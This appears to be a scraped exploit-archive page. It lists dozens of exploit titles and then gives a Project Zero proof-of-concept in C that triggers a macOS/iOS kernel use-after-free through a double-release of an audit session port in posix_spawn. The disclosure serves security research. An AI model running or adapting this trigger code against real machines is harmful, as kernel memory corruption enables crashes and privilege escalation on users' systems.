6624e39c26
31 new exploits macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free Apple WebKit - 'RenderLayer' Use-After-Free Apple WebKit - Negative-Size memmove in HTMLFormElement Apple WebKit - 'FormSubmission::create' Use-After-Free Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free Apple WebKit - 'table' Use-After-Free Apple WebKit - 'WebCore::toJS' Use-After-Free macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit) Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit) Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow Pixie 1.0.4 - Arbitrary File Upload Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting Maian Uploader 4.0 - 'index.php' Cross-Site Scripting Maian Uploader 4.0 - 'header.php' Cross-Site Scripting Maian Uploader 4.0 - 'user' Parameter SQL Injection Maian Survey 1.1 - 'survey' Parameter SQL Injection Maian Greetings 2.1 - 'cat' Parameter SQL Injection
70 lines
2.8 KiB
C
Executable file
70 lines
2.8 KiB
C
Executable file
/*
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1104
|
|
|
|
exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.
|
|
|
|
It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)
|
|
|
|
For the special, exception and audit ports it tries to update the new task to reflect the port action
|
|
by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if
|
|
any of those calls fail it calls ipc_port_release_send(port).
|
|
|
|
task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail
|
|
but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on
|
|
the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't
|
|
an audit session port.
|
|
|
|
This means we can cause two references to be dropped on the port when only one is held leading to a
|
|
use after free in the kernel.
|
|
|
|
Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2
|
|
*/
|
|
|
|
// ianbeer
|
|
#if 0
|
|
MacOS/iOS kernel uaf due to double-release in posix_spawn
|
|
|
|
exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.
|
|
|
|
It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)
|
|
|
|
For the special, exception and audit ports it tries to update the new task to reflect the port action
|
|
by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if
|
|
any of those calls fail it calls ipc_port_release_send(port).
|
|
|
|
task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail
|
|
but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on
|
|
the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't
|
|
an audit session port.
|
|
|
|
This means we can cause two references to be dropped on the port when only one is held leading to a
|
|
use after free in the kernel.
|
|
|
|
Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2
|
|
#endif
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <spawn.h>
|
|
|
|
#include <mach/mach.h>
|
|
|
|
int main() {
|
|
|
|
mach_port_t p = MACH_PORT_NULL;
|
|
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
|
|
mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
|
|
|
|
posix_spawnattr_t attrs;
|
|
posix_spawnattr_init(&attrs);
|
|
posix_spawnattr_setauditsessionport_np(&attrs,p);
|
|
|
|
char* _argv[] = {"/usr/bin/id", NULL};
|
|
int child_pid = 0;
|
|
int spawn_err = posix_spawn(&child_pid,
|
|
"/usr/bin/id",
|
|
NULL, // file actions
|
|
&attrs,
|
|
_argv,
|
|
NULL);
|
|
}
|